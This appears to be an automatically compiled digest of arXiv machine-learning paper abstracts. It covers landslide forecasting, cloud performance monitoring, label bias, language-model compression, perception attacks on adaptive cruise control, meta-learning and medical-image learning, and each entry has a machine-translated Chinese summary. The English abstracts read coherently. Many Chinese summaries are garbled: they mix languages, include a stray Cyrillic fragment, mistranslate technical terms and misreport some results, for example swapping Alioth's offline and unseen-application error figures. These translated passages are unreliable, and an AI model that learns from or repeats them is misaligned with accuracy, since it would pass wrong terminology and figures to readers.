Tibetan Plateau. When prior knowledge is incorporated, we show that interpretable landslide forecasting effectively identifies influential factors across various landslides. It further elucidates how local areas respond to these factors, making landslide behavior and trends more interpretable and predictable. The findings from this study will contribute to understanding landslide behavior in a new way and make the proposed approach applicable to other complex disasters influenced by internal and external factors in the future.

摘要
预测滑坡的发展趋势或是否会失败是一项复杂的任务，因为它们受到多种内部和外部因素的影响。 DESPITE THEIR POTENTIAL TO ADDRESS THESE CHALLENGES, deep learning techniques lack interpretability, which undermines the credibility of the forecasts they produce. However, the recent development of transformer-based deep learning offers untapped possibilities for forecasting landslides with unprecedented interpretability and nonlinear feature learning capabilities. 在这种情况下，我们提出了一个深度学习管道，可以捕捉滑坡的行为的整体特征，该管道使用名为LFIT的变换器基于网络，可以学习复杂的非线性关系，并且可以确定最重要的变量。通过结合先前知识，我们提供了改进的总体滑坡预测方法，可以捕捉不同的滑坡区域响应不同的外部因素的多样化响应。使用塑形观察作为滑坡动力的代理，我们验证了我们的方法，通过在三峡水库和藏北高原的滑坡中训练模型，预测滑坡的发展趋势。当嵌入先前知识时，我们显示出可解释的滑坡预测方法可以准确地确定影响滑坡的因素，并且可以解释不同的滑坡区域如何响应这些因素，使滑坡行为和趋势更加可解释和预测。这些发现将在未来对其他复杂的自然灾害，受到内部和外部因素影响的灾害中应用。

Alioth: A Machine Learning Based Interference-Aware Performance Monitor for Multi-Tenancy Applications in Public Cloud

paper_url: http://arxiv.org/abs/2307.08949
repo_url: https://github.com/sthowling/alioth
paper_authors: Tianyao Shi, Yingxuan Yang, Yunlong Cheng, Xiaofeng Gao, Zhen Fang, Yongqiang Yang
for: This paper aims to monitor the performance degradation of cloud applications in public clouds caused by co-location interference.methods: The proposed method, Alioth, uses a novel machine learning framework that includes interference generators, denoising auto-encoders, domain adaptation neural networks, and SHAP explainers to monitor performance degradation.results: Alioth achieves an average mean absolute error of 5.29% offline and 10.8% when testing on applications unseen in the training stage, outperforming baseline methods. It also demonstrates robustness in signaling quality-of-service violation under dynamicity.

Abstract
Multi-tenancy in public clouds may lead to co-location interference on shared resources, which possibly results in performance degradation of cloud applications. Cloud providers want to know when such events happen and how serious the degradation is, to perform interference-aware migrations and alleviate the problem. However, virtual machines (VM) in Infrastructure-as-a-Service public clouds are black-boxes to providers, where application-level performance information cannot be acquired. This makes performance monitoring intensely challenging as cloud providers can only rely on low-level metrics such as CPU usage and hardware counters. We propose a novel machine learning framework, Alioth, to monitor the performance degradation of cloud applications. To feed the data-hungry models, we first elaborate interference generators and conduct comprehensive co-location experiments on a testbed to build Alioth-dataset which reflects the complexity and dynamicity in real-world scenarios. Then we construct Alioth by (1) augmenting features via recovering low-level metrics under no interference using denoising auto-encoders, (2) devising a transfer learning model based on domain adaptation neural network to make models generalize on test cases unseen in offline training, and (3) developing a SHAP explainer to automate feature selection and enhance model interpretability. Experiments show that Alioth achieves an average mean absolute error of 5.29% offline and 10.8% when testing on applications unseen in the training stage, outperforming the baseline methods. Alioth is also robust in signaling quality-of-service violation under dynamicity. Finally, we demonstrate a possible application of Alioth's interpretability, providing insights to benefit the decision-making of cloud operators. The dataset and code of Alioth have been released on GitHub.

摘要
多重租户在公共云上可能导致共享资源上的干扰，从而导致云应用程序的性能下降。云提供商希望在这些事件发生时知道其严重程度，以进行干扰意识的迁移和缓解问题。然而，基础设施协议（IaaS）云公共云中的虚拟机（VM）对提供商是黑洞，无法获得应用层性能信息。这使得性能监测变得非常困难，cloud提供商只能依靠低级别指标，如CPU使用率和硬件计数器。我们提出了一种新的机器学习框架，称为Alioth，用于监测云应用程序的性能下降。为了充实数据鲁棒的模型，我们首先 elaborated interference generators和在testbed上进行了广泛的共享实验，以建立Alioth-dataset，该集合反映了实际场景中的复杂性和动态性。然后，我们构建了Alioth，包括以下三个主要组成部分：1. 通过使用降噪自适应神经网络恢复低级别指标，扩展特征。2. 基于域 adapted神经网络模型，以便模型在测试 случаeschannel unseen in offline training中 generalize。3. 开发 SHAP解释器，以自动选择特征和提高模型解释性。实验表明，Alioth在线上和离线上的平均绝对误差为5.29%和10.8% respectively，比基eline方法优化。此外，Alioth在动态环境下也具有可靠的质量服务预测能力。最后，我们示出了Alioth的解释性可以为云运维师提供有价值的决策指导。Alioth-dataset和相关代码已经在GitHub上发布。

Mitigating Label Bias via Decoupled Confident Learning

paper_url: http://arxiv.org/abs/2307.08945
repo_url: None
paper_authors: Yunyi Li, Maria De-Arteaga, Maytal Saar-Tsechansky
for: 本研究旨在提出一种特点是适应标签偏见的分类方法，以便在涉及重要领域中减少算法偏见。
methods: 本研究提出了一种名为分离信心学习（DeCoLe）的遮盾方法，该方法可以减少标签偏见的影响。
results: 在一个Synthetic数据集上测试了DeCoLe方法，结果显示其能够成功地检测出偏见标签，并且在仇恨言语识别任务中超过其他方法表现。

Abstract
Growing concerns regarding algorithmic fairness have led to a surge in methodologies to mitigate algorithmic bias. However, such methodologies largely assume that observed labels in training data are correct. This is problematic because bias in labels is pervasive across important domains, including healthcare, hiring, and content moderation. In particular, human-generated labels are prone to encoding societal biases. While the presence of labeling bias has been discussed conceptually, there is a lack of methodologies to address this problem. We propose a pruning method -- Decoupled Confident Learning (DeCoLe) -- specifically designed to mitigate label bias. After illustrating its performance on a synthetic dataset, we apply DeCoLe in the context of hate speech detection, where label bias has been recognized as an important challenge, and show that it successfully identifies biased labels and outperforms competing approaches.

摘要
algorithmic fairness的问题在不断增加，这导致了一系列方法来减少算法偏见。然而，这些方法假设训练数据中的标签是正确的。这是一个问题，因为标签中的偏见是广泛存在的，包括医疗、招聘和内容审核等重要领域。人类生成的标签容易带有社会偏见。虽然标签偏见的存在已经被讨论，但是没有有效的方法来解决这个问题。我们提出了一种剪裁方法——分离信任学习（DeCoLe），特意设计来减少标签偏见。我们在一个 sintetic 数据集上验证了 DeCoLe 的性能，然后在仇恨言语检测中应用了 DeCoLe，并证明它成功地标识了偏见标签，并超过了竞争方法的性能。

Siamese Networks for Weakly Supervised Human Activity Recognition

paper_url: http://arxiv.org/abs/2307.08944
repo_url: None
paper_authors: Taoran Sheng, Manfred Huber
for: 这篇论文旨在应用深度学习于人体活动识别，但是训练深度神经网络需要大量的明确标注数据，这是困难的获得。
methods: 这篇论文提出了一种使用多个同构网络进行训练，只使用数据对的相似性信息来训练模型，从而生成一个可以作为各种各样的聚类算法的度量模型。
results: 论文在三个数据集上进行了评估，并证明了模型的效果iveness在分类和识别连续人体活动序列中。

Abstract
Deep learning has been successfully applied to human activity recognition. However, training deep neural networks requires explicitly labeled data which is difficult to acquire. In this paper, we present a model with multiple siamese networks that are trained by using only the information about the similarity between pairs of data samples without knowing the explicit labels. The trained model maps the activity data samples into fixed size representation vectors such that the distance between the vectors in the representation space approximates the similarity of the data samples in the input space. Thus, the trained model can work as a metric for a wide range of different clustering algorithms. The training process minimizes a similarity loss function that forces the distance metric to be small for pairs of samples from the same kind of activity, and large for pairs of samples from different kinds of activities. We evaluate the model on three datasets to verify its effectiveness in segmentation and recognition of continuous human activity sequences.

摘要
深度学习已成功应用于人类活动识别。然而，训练深度神经网络需要明确标注的数据，具体来说是困难的获得。在这篇论文中，我们提出了一种使用多个同构网络进行训练，不需要明确标注数据。训练模型将活动数据样本映射到固定大小的表示向量中，使得表示空间中的距离 approximates 输入空间中的相似性。因此，训练模型可以作为各种不同的聚类算法的度量。训练过程中 minimizes 一个相似损失函数，该函数让距离度量在同类活动样本对应的情况下很小，并在不同类活动样本对应的情况下很大。我们在三个数据集上验证了模型的有效性，以确认其在连续人类活动序列的分割和识别方面的表现。

NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning

paper_url: http://arxiv.org/abs/2307.08941
repo_url: https://github.com/weitianxin/mlp_fusion
paper_authors: Tianxin Wei, Zeming Guo, Yifan Chen, Jingrui He
for: 这篇论文旨在提出一种通过NTK数据来实现简化预训练语言模型（PLM）的方法，以减少PLM的计算和内存需求。
methods: 本文使用NTK几何来检查PLM的多层感知器（MLP）模组，并提出一种通过将MLP装置为一些中心的组合来实现轻量级PLM的方法。
results: 实验结果显示，该方法可以实现PLM的简化，并在自然语言理解（NLU）和生成（NLG）任务上进行了有效的调整。

Abstract
Fine-tuning a pre-trained language model (PLM) emerges as the predominant strategy in many natural language processing applications. However, even fine-tuning the PLMs and doing inference are expensive, especially on edge devices with low computing power. Some general approaches (e.g. quantization and distillation) have been widely studied to reduce the compute/memory of PLM fine-tuning, while very few one-shot compression techniques are explored. In this paper, we investigate the neural tangent kernel (NTK)--which reveals the gradient descent dynamics of neural networks--of the multilayer perceptrons (MLP) modules in a PLM and propose to coin a lightweight PLM through NTK-approximating MLP fusion. To achieve this, we reconsider the MLP as a bundle of sub-MLPs, and cluster them into a given number of centroids, which can then be restored as a compressed MLP and surprisingly shown to well approximate the NTK of the original PLM. Extensive experiments of PLM fine-tuning on both natural language understanding (NLU) and generation (NLG) tasks are provided to verify the effectiveness of the proposed method MLP fusion. Our code is available at https://github.com/weitianxin/MLP_Fusion.

摘要
大多数自然语言处理应用中出现了调整预训练语言模型（PLM）的方法。然而，即使是调整PLM和做出判断都是昂贵的，特别是在边缘设备上进行。一些通用的方法（如量化和液化）已经广泛研究以降低PLM调整的计算/存储量，而很少有一次性压缩技术被探索。在这篇论文中，我们研究了神经积分析（NTK）——描述神经网络的梯度下降动力学——的多层感知器（MLP）模块在PLM中，并提议通过NTK-近似MLP融合来创造轻量级PLM。为此，我们重新考虑MLP为一个分解成多个子MLP的Bundle，并将其分成一定数量的中心点，然后可以将其Restore为压缩MLP，并意外地发现可以良好地近似原PLM的NTK。我们提供了大量PLM精度调整NLU和NLG任务的实验来证明提议的方法的有效性。我们的代码可以在https://github.com/weitianxin/MLP_Fusion上找到。

Experimental Security Analysis of DNN-based Adaptive Cruise Control under Context-Aware Perception Attacks

paper_url: http://arxiv.org/abs/2307.08939
repo_url: None
paper_authors: Xugui Zhou, Anqi Chen, Maxfield Kouzel, Haotian Ren, Morgan McCarty, Cristina Nita-Rotaru, Homa Alemzadeh
for: 评估深度神经网络（DNN）基于自适应巡航控制（ACC）系统的安全性，以防止恶意投毒攻击引起前方碰撞。
methods: 提出了一种结合知识驱动和数据驱动的方法，用于在攻击时选择最 kritical时刻，以及一种基于优化的方法来在运行时生成适应性的图像偏移。
results: 通过实验和实际驱动 simulator Platform 和生产 ACC 系统，发现提案的攻击可以 achiev 142.9x 高的成功率，同时受到安全功能（如自动紧急刹车和前方碰撞预警）的干扰减少了89.6%。这种攻击 Robust 到实际世界因素和环境动态变化，同时能够避免被发现。这种研究提供了人类运行员和基本安全功能的抗攻击策略。

Abstract
Adaptive Cruise Control (ACC) is a widely used driver assistance feature for maintaining desired speed and safe distance to the leading vehicles. This paper evaluates the security of the deep neural network (DNN) based ACC systems under stealthy perception attacks that strategically inject perturbations into camera data to cause forward collisions. We present a combined knowledge-and-data-driven approach to design a context-aware strategy for the selection of the most critical times for triggering the attacks and a novel optimization-based method for the adaptive generation of image perturbations at run-time. We evaluate the effectiveness of the proposed attack using an actual driving dataset and a realistic simulation platform with the control software from a production ACC system and a physical-world driving simulator while considering interventions by the driver and safety features such as Automatic Emergency Braking (AEB) and Forward Collision Warning (FCW). Experimental results show that the proposed attack achieves 142.9x higher success rate in causing accidents than random attacks and is mitigated 89.6% less by the safety features while being stealthy and robust to real-world factors and dynamic changes in the environment. This study provides insights into the role of human operators and basic safety interventions in preventing attacks.

摘要
这篇研究评估了基于深度神经网络（DNN）的自适应巡航控制（ACC）系统的安全性，以及这些系统对于隐藏式感知攻击的抵抗力。我们提出了一种结合知识驱动和数据驱动的方法，以选择最重要的时刻进行攻击，并且使用优化方法生成Run-time中的像素噪声。我们使用实际驾驶数据和真实的驾驶 simulate平台，考虑到驾驶员的干预和安全功能，例如自动紧急刹车（AEB）和前方冲击警示（FCW）。实验结果显示，我们的攻击成功率高于随机攻击的142.9倍，并且受到安全功能的抑制89.6%。此研究给出了人类驾驶员和基本安全功能的防御效果。

Multi-stage Neural Networks: Function Approximator of Machine Precision

paper_url: http://arxiv.org/abs/2307.08934
repo_url: None
paper_authors: Yongji Wang, Ching-Yao Lai
for: 这 paper 是为了提高神经网络在科学问题中的精度，并且使用多stage neural networks来mitigate spectral biases。
methods: 这 paper 使用了多stage neural networks，将训练过程分成不同的阶段，每个阶段使用一个新的网络来适应剩下的差异。
results: 这 paper 表明，使用多stage neural networks可以减少预测错误至O(10^{-16})水平，这是单个神经网络很难达到的精度。

Abstract
Deep learning techniques are increasingly applied to scientific problems, where the precision of networks is crucial. Despite being deemed as universal function approximators, neural networks, in practice, struggle to reduce the prediction errors below $O(10^{-5})$ even with large network size and extended training iterations. To address this issue, we developed the multi-stage neural networks that divides the training process into different stages, with each stage using a new network that is optimized to fit the residue from the previous stage. Across successive stages, the residue magnitudes decreases substantially and follows an inverse power-law relationship with the residue frequencies. The multi-stage neural networks effectively mitigate the spectral biases associated with regular neural networks, enabling them to capture the high frequency feature of target functions. We demonstrate that the prediction error from the multi-stage training for both regression problems and physics-informed neural networks can nearly reach the machine-precision $O(10^{-16})$ of double-floating point within a finite number of iterations. Such levels of accuracy are rarely attainable using single neural networks alone.

摘要
深度学习技术在科学问题中越来越广泛应用，其精度的网络是关键。尽管被认为是通用函数近似器，实际上，神经网络在实践中难以降低预测错误 Below $O(10^{-5})$，即使使用大型网络和长时间训练轮次。为解决这问题，我们开发了多 stage 神经网络，将训练过程分解成不同的阶段，每个阶段使用新的网络，该网络是适应前一阶段剩余的。在 successive 阶段中，剩余大小减少了很多，并且与剩余频率关系为 inverse power-law 关系。多 stage 神经网络有效地 mitigate 神经网络的 спектраль偏好，使其能够捕捉目标函数的高频特征。我们示出，使用多 stage 训练，对于回归问题和物理学 Informed neural networks 的预测错误可以几乎达到机器精度 $O(10^{-16})$ 的水平，这些精度在单个神经网络alone 中 rarely 可以达到。

IxDRL: A Novel Explainable Deep Reinforcement Learning Toolkit based on Analyses of Interestingness

paper_url: http://arxiv.org/abs/2307.08933
repo_url: https://github.com/sri-aic/23-xai-ixdrl-data
paper_authors: Pedro Sequeira, Melinda Gervasio
for:The paper aims to provide a more explainable deep reinforcement learning (xDRL) framework to help human operators understand the competence of RL agents in complex decision-making tasks.methods:The proposed framework is based on interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit.results:The approach can identify agent behavior patterns and competency-controlling conditions, and the task elements mostly responsible for an agent’s competence, based on global and local analyses of interestingness. The framework provides agent designers with insights about RL agent competence, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.

Abstract
In recent years, advances in deep learning have resulted in a plethora of successes in the use of reinforcement learning (RL) to solve complex sequential decision tasks with high-dimensional inputs. However, existing systems lack the necessary mechanisms to provide humans with a holistic view of their competence, presenting an impediment to their adoption, particularly in critical applications where the decisions an agent makes can have significant consequences. Yet, existing RL-based systems are essentially competency-unaware in that they lack the necessary interpretation mechanisms to allow human operators to have an insightful, holistic view of their competency. Towards more explainable Deep RL (xDRL), we propose a new framework based on analyses of interestingness. Our tool provides various measures of RL agent competence stemming from interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit. We showcase the use of our framework by applying the proposed pipeline in a set of scenarios of varying complexity. We empirically assess the capability of the approach in identifying agent behavior patterns and competency-controlling conditions, and the task elements mostly responsible for an agent's competence, based on global and local analyses of interestingness. Overall, we show that our framework can provide agent designers with insights about RL agent competence, both their capabilities and limitations, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.

摘要
To address this issue, we propose a new framework based on interestingness analysis to provide a more explainable Deep RL (xDRL) system. Our tool provides various measures of RL agent competence stemming from interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit.We demonstrate the use of our framework by applying it to a set of scenarios of varying complexity. We empirically assess the capability of the approach in identifying agent behavior patterns and competency-controlling conditions, as well as the task elements most responsible for an agent's competence, based on global and local analyses of interestingness.Our framework provides agent designers with insights into RL agent competence, including their capabilities and limitations, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.

Submodular Maximization under the Intersection of Matroid and Knapsack Constraints

paper_url: http://arxiv.org/abs/2307.09487
repo_url: None
paper_authors: Yu-Ran Gu, Chao Bian, Chao Qian
for: 本文研究的目的是解决具有 intersection of $k$-matroid constraint和$m$-knapsack constraint的submodular maximization问题。
methods: 作者提出了一种名为SPROUT的新算法，通过将partial enumeration incorporated into the simultaneous greedy framework来解决该问题。
results: 作者证明了SPROUT可以在几乎polynomial时间内实现更好的approximation guarantee，并通过引入随机枚举和矫正技术，开发出了SPROUT++算法，在实践中具有更高的效率和相似的approximation guarantee。

Abstract
Submodular maximization arises in many applications, and has attracted a lot of research attentions from various areas such as artificial intelligence, finance and operations research. Previous studies mainly consider only one kind of constraint, while many real-world problems often involve several constraints. In this paper, we consider the problem of submodular maximization under the intersection of two commonly used constraints, i.e., $k$-matroid constraint and $m$-knapsack constraint, and propose a new algorithm SPROUT by incorporating partial enumeration into the simultaneous greedy framework. We prove that SPROUT can achieve a polynomial-time approximation guarantee better than the state-of-the-art algorithms. Then, we introduce the random enumeration and smooth techniques into SPROUT to improve its efficiency, resulting in the SPROUT++ algorithm, which can keep a similar approximation guarantee. Experiments on the applications of movie recommendation and weighted max-cut demonstrate the superiority of SPROUT++ in practice.

摘要
<>设k和m为两个正整数，我们考虑一个问题：在k-matroid约束和m-吸顺约束下，最大化submodular函数的问题。之前的研究主要考虑单一约束，而实际问题通常涉及多个约束。在本文中，我们提出了一种新的算法SPROUT，它通过同时干扰框架中的增量扩展来解决这个问题。我们证明了SPROUT可以在几乎真实时间内提供更好的近似度 garantia。然后，我们将随机枚举和缓和技术添加到SPROUT中，得到了SPROUT++算法，它可以保持相似的近似度 garantia。在电影推荐和权重最大枢纽问题的应用中，SPROUT++在实践中表现出了superiority。Note: The text has been translated using Google Translate, and may not be perfect.

On-the-fly machine learning for parametrization of the effective Hamiltonian

paper_url: http://arxiv.org/abs/2307.08929
repo_url: None
paper_authors: Xingyue Ma, L. Bellaiche, Di Wu, Yurong Yang
for: 这研究旨在开发一种基于机器学习的启动式有效汉姆逻辑，用于预测和模拟 ferroelectrics 和 relaxor ferroelectrics 的性质。
methods: 这种方法使用 Bayesian 线性回归来 Parametrize 有效汉姆逻辑，在分子动力学实验中完成 Parametrization，并预测能量、力和压力以及它们的不确定性。当不确定性较大时，使用首要原理计算来重新训练参数。
results: 这种方法可以自动计算任何考虑系统的有效汉姆逻辑参数，包括复杂系统，而传统方法无法处理。用 BaTiO3 和 Pb(Sc,Ta)O3 作为示例，这种方法的准确性与传统首要原理 Parametrization 方法相当。

Abstract
The first-principles-based effective Hamiltonian is widely used to predict and simulate the properties of ferroelectrics and relaxor ferroelectrics. However, the parametrization method of the effective Hamiltonian is complicated and hardly can resolve the systems with complex interactions and/or complex components. Here, we developed an on-the-fly machine learning approach to parametrize the effective Hamiltonian based on Bayesian linear regression. The parametrization is completed in molecular dynamics simulations, with the energy, forces and stress predicted at each step along with their uncertainties. First-principles calculations are executed when the uncertainties are large to retrain the parameters. This approach provides a universal and automatic way to compute the effective Hamiltonian parameters for any considered systems including complex systems which previous methods can not handle. BaTiO3 and Pb(Sc,Ta)O3 are taken as examples to show the accurateness of this approach comparing with conventional first-principles parametrization method.

摘要
<>使用基本原理效 Hamiltonians 广泛预测和模拟 ferroelectrics 和 relaxor ferroelectrics 的性质。然而，基于效 Hamiltonians 的参数化方法复杂，难以处理复杂的交互和/或复杂的组分。我们在分子动力学实验中开发了一种在飞行中机器学习方法来参数化效 Hamiltonians，通过 Bayesian 线性回归来完成。在每步的分子动力学 simulate 中，能量、力和压力都预测了，同时预测了它们的不确定性。当不确定性大于一定程度时，我们使用首先原理计算来重新训练参数。这种方法提供了一种通用和自动的方法来计算效 Hamiltonians 参数，可以处理任何考虑的系统，包括复杂的系统，先前的方法无法处理。作为例子，我们选择了 BaTiO3 和 Pb(Sc,Ta)O3 来说明这种方法的准确性，与传统的首先原理参数化方法进行比较。

Federated Large Language Model: A Position Paper

paper_url: http://arxiv.org/abs/2307.08925
repo_url: None
paper_authors: Chaochao Chen, Xiaohua Feng, Jun Zhou, Jianwei Yin, Xiaolin Zheng
for: 这个研究旨在解决大规模语言模型（LLM）的开发问题，特别是在实际应用中遇到的挑战，例如公共领域数据的缺乏和维护private领域数据的隐私。
methods: 这个研究提出了一种称为“联邦式语言模型”（federated LLM）的技术，它包括三个主要的component，即联邦式语言模型预训练、联邦式语言模型细化和联邦式语言模型提示工程。每个component都有优点比传统LLM训练方法，并且提出了具体的工程策略来实现。
results: 这个研究获得了联邦式语言模型的优点，包括可以解决实际应用中的挑战，并且可以维护隐私和数据安全性。此外，研究也发现了联邦式语言模型在某些情况下可能会面临新的挑战和障碍。

Abstract
Large scale language models (LLM) have received significant attention and found diverse applications across various domains, but their development encounters challenges in real-world scenarios. These challenges arise due to the scarcity of public domain data availability and the need to maintain privacy with respect to private domain data. To address these issues, federated learning (FL) has emerged as a promising technology that enables collaborative training of shared models while preserving decentralized data. We propose the concept of federated LLM, which comprises three key components, i.e., federated LLM pre-training, federated LLM fine-tuning, and federated LLM prompt engineering. For each component, we discuss its advantage over traditional LLM training methods and propose specific engineering strategies for implementation. Furthermore, we explore the novel challenges introduced by the integration of FL and LLM. We analyze existing solutions and identify potential obstacles faced by these solutions within the context of federated LLM.

摘要

Learning to Sample Tasks for Meta Learning

paper_url: http://arxiv.org/abs/2307.08924
repo_url: https://github.com/ZJLAB-AMMI/HS-OMRL
paper_authors: Jingyao Wang, Zeen Song, Xingzhe Su, Lingyu Si, Hongwei Dong, Wenwen Qiang, Changwen Zheng
for: 通过对各种元学习方法、任务采样器和少量学习任务进行实验，这篇论文得出了三个结论。首先，无法确保元学习模型性能的通用任务采样策略。其次，任务多样性可能导致模型在训练中 Either underfit 或 overfit。最后，模型的总结果受任务分化、任务熵和任务Difficulty的影响。
methods: 作者提出了一种名为 Adaptive Sampler (ASr) 的新任务采样器，该采样器可以根据任务分化、任务熵和任务Difficulty来采样任务。以便优化 ASr，作者提出了一种简单普适的元学习算法。
results: 许多实验证明了提出的 ASr 的有效性。

Abstract
Through experiments on various meta-learning methods, task samplers, and few-shot learning tasks, this paper arrives at three conclusions. Firstly, there are no universal task sampling strategies to guarantee the performance of meta-learning models. Secondly, task diversity can cause the models to either underfit or overfit during training. Lastly, the generalization performance of the models are influenced by task divergence, task entropy, and task difficulty. In response to these findings, we propose a novel task sampler called Adaptive Sampler (ASr). ASr is a plug-and-play task sampler that takes task divergence, task entropy, and task difficulty to sample tasks. To optimize ASr, we rethink and propose a simple and general meta-learning algorithm. Finally, a large number of empirical experiments demonstrate the effectiveness of the proposed ASr.

摘要
通过多种元学习方法、任务采样策略和少量学习任务的实验，这篇论文得出了三个结论。首先，没有一种通用的任务采样策略可以保证元学习模型的性能。第二，任务多样性可以使模型在训练中出现下降或过度适应。最后，模型的总体性能受到任务分化、任务 entropy 和任务难度的影响。为了应对这些发现，我们提出了一种名为 Adaptive Sampler（ASr）的任务采样器。ASr 是一个插件和玩家的任务采样器，它根据任务分化、任务 entropy 和任务难度来采样任务。为了优化 ASr，我们提出了一种简单和通用的元学习算法。最后，大量的实验证明了我们提出的 ASr 的有效性。

Optimistic Estimate Uncovers the Potential of Nonlinear Models

paper_url: http://arxiv.org/abs/2307.08921
repo_url: None
paper_authors: Yaoyu Zhang, Zhongwang Zhang, Leyang Zhang, Zhiwei Bai, Tao Luo, Zhi-Qin John Xu
for: 评估非线性模型最佳适应性表现的估计方法。
methods: 使用非线性模型，并且采用估计最小样本大小以达到目标函数的最佳适应性。
results: 对矩阵分解模型、深度模型和深度神经网络（DNN）进行了估计，并证明了这些模型在过参数化下的可适应性。此外，研究还发现了深度神经网络的两种特殊性：自由表达能力和成本表达能力。这两种特殊性提出了建议DNNS的建模设计原则：（一）不妨添加神经元和核函数；（二）限制神经元之间的连接。通过这种框架，我们预计在未来更深入理解如何和为什么许多非线性模型在实践中能够有效实现其潜在可能性。

Abstract
We propose an optimistic estimate to evaluate the best possible fitting performance of nonlinear models. It yields an optimistic sample size that quantifies the smallest possible sample size to fit/recover a target function using a nonlinear model. We estimate the optimistic sample sizes for matrix factorization models, deep models, and deep neural networks (DNNs) with fully-connected or convolutional architecture. For each nonlinear model, our estimates predict a specific subset of targets that can be fitted at overparameterization, which are confirmed by our experiments. Our optimistic estimate reveals two special properties of the DNN models -- free expressiveness in width and costly expressiveness in connection. These properties suggest the following architecture design principles of DNNs: (i) feel free to add neurons/kernels; (ii) restrain from connecting neurons. Overall, our optimistic estimate theoretically unveils the vast potential of nonlinear models in fitting at overparameterization. Based on this framework, we anticipate gaining a deeper understanding of how and why numerous nonlinear models such as DNNs can effectively realize their potential in practice in the near future.

摘要
我们提出了一种优派估计来评估非线性模型的最佳适应性表现。它提供了一个最小的样本大小，用于评估目标函数使用非线性模型适应的可能性。我们对矩阵因子化模型、深度模型和深度神经网络（DNN）进行了估计，并证明了每种非线性模型的估计预测了一个特定的目标集可以在过参数化下适应。我们的估计还揭示了深度神经网络（DNN）模型的两种特殊性：自由表达能力和成本表达能力。这两种特殊性建议了深度神经网络（DNN）模型的建设设计原则：（i）自由添加神经元/核函数；（ii）限制神经元之间的连接。总的来说，我们的优派估计 theoretically 探明了非线性模型在过参数化下的潜在适应能力。基于这个框架，我们预计在未来将更深入地理解非线性模型在实践中如何有效地实现其潜在。

Continuous-Time Reinforcement Learning: New Design Algorithms with Theoretical Insights and Performance Guarantees

paper_url: http://arxiv.org/abs/2307.08920
repo_url: None
paper_authors: Brent A. Wallace, Jennie Si
for: 这个论文的目的是提出一种新的连续时间非线性优化控制方法，用于控制非线性系统。
methods: 这种方法基于分解physical system into smaller subproblems，并引入了一种新的刺激框架，以提高 persistency of excitation 和数值稳定性。
results: 这些算法可以提供 convergence 和关闭Loop稳定性保证，并在控制一个不稳定、非最小频段高速飞行器（HSV）上进行了示例应用。

Abstract
Continuous-time nonlinear optimal control problems hold great promise in real-world applications. After decades of development, reinforcement learning (RL) has achieved some of the greatest successes as a general nonlinear control design method. However, a recent comprehensive analysis of state-of-the-art continuous-time RL (CT-RL) methods, namely, adaptive dynamic programming (ADP)-based CT-RL algorithms, reveals they face significant design challenges due to their complexity, numerical conditioning, and dimensional scaling issues. Despite advanced theoretical results, existing ADP CT-RL synthesis methods are inadequate in solving even small, academic problems. The goal of this work is thus to introduce a suite of new CT-RL algorithms for control of affine nonlinear systems. Our design approach relies on two important factors. First, our methods are applicable to physical systems that can be partitioned into smaller subproblems. This constructive consideration results in reduced dimensionality and greatly improved intuitiveness of design. Second, we introduce a new excitation framework to improve persistence of excitation (PE) and numerical conditioning performance via classical input/output insights. Such a design-centric approach is the first of its kind in the ADP CT-RL community. In this paper, we progressively introduce a suite of (decentralized) excitable integral reinforcement learning (EIRL) algorithms. We provide convergence and closed-loop stability guarantees, and we demonstrate these guarantees on a significant application problem of controlling an unstable, nonminimum phase hypersonic vehicle (HSV).

摘要
<>translation into Simplified Chinese<>连续时间非线性优化控制问题在实际应用中具有很大的推动力。在过去的几十年中，强化学习（RL）已经取得了一些非常成功的非线性控制设计方法。然而，一个最近的总体分析表明，使用ADP基于CT-RL算法的continuous-time RL（CT-RL）方法面临着复杂性、数值条件和维度增加问题。尽管有了先进的理论成果，现有的ADP CT-RL合成方法无法解决even small的学术问题。本工作的目标是引入一组新的CT-RL算法，用于控制非线性系统。我们的设计方法基于以下两个重要因素。首先，我们的方法适用于可以被分解成更小的子问题的物理系统。这种构建考虑导致维度减少和设计更加直观的问题。其次，我们引入了一个新的刺激框架，以提高持续刺激（PE）和数值条件性性能。这种设计中心的方法是CT-RL社区中的第一个。在这篇论文中，我们逐渐介绍了一组（分布式）刺激积分学习（EIRL）算法。我们提供了收敛和关闭Loop稳定性保证，并在一个重要应用问题中控制不稳定、非最小阶段速度飞行器（HSV）中进行了证明。

Accuracy versus time frontiers of semi-supervised and self-supervised learning on medical images

paper_url: http://arxiv.org/abs/2307.08919
repo_url: https://github.com/tufts-ml/ssl-vs-ssl-benchmark
paper_authors: Zhe Huang, Ruijie Jiang, Shuchin Aeron, Michael C. Hughes
for: 本研究的目的是为了解决资源受限、结果受关注的医学图像分类问题，通过采用自我超级vised学习和 semi-supervised learning方法，提高分类器的性能。
methods: 本研究使用了6种 semi-supervised 方法和5种自我超级vised学习方法，并与高品质标注数据作为基准进行比较。
results: 研究发现， MixMatch、SimCLR 和 BYOL 等方法在3种医学图像 datasets 上表现出色，并且可以在几个小时内达到优秀的性能。同时，通过选择适当的 hyperparameter 和进行较多的训练，可以获得进一步的提升。

Abstract
For many applications of classifiers to medical images, a trustworthy label for each image can be difficult or expensive to obtain. In contrast, images without labels are more readily available. Two major research directions both promise that additional unlabeled data can improve classifier performance: self-supervised learning pretrains useful representations on unlabeled data only, then fine-tunes a classifier on these representations via the labeled set; semi-supervised learning directly trains a classifier on labeled and unlabeled data simultaneously. Recent methods from both directions have claimed significant gains on non-medical tasks, but do not systematically assess medical images and mostly compare only to methods in the same direction. This study contributes a carefully-designed benchmark to help answer a practitioner's key question: given a small labeled dataset and a limited budget of hours to spend on training, what gains from additional unlabeled images are possible and which methods best achieve them? Unlike previous benchmarks, ours uses realistic-sized validation sets to select hyperparameters, assesses runtime-performance tradeoffs, and bridges two research fields. By comparing 6 semi-supervised methods and 5 self-supervised methods to strong labeled-only baselines on 3 medical datasets with 30-1000 labels per class, we offer insights to resource-constrained, results-focused practitioners: MixMatch, SimCLR, and BYOL represent strong choices that were not surpassed by more recent methods. After much effort selecting hyperparameters on one dataset, we publish settings that enable strong methods to perform well on new medical tasks within a few hours, with further search over dozens of hours delivering modest additional gains.

摘要
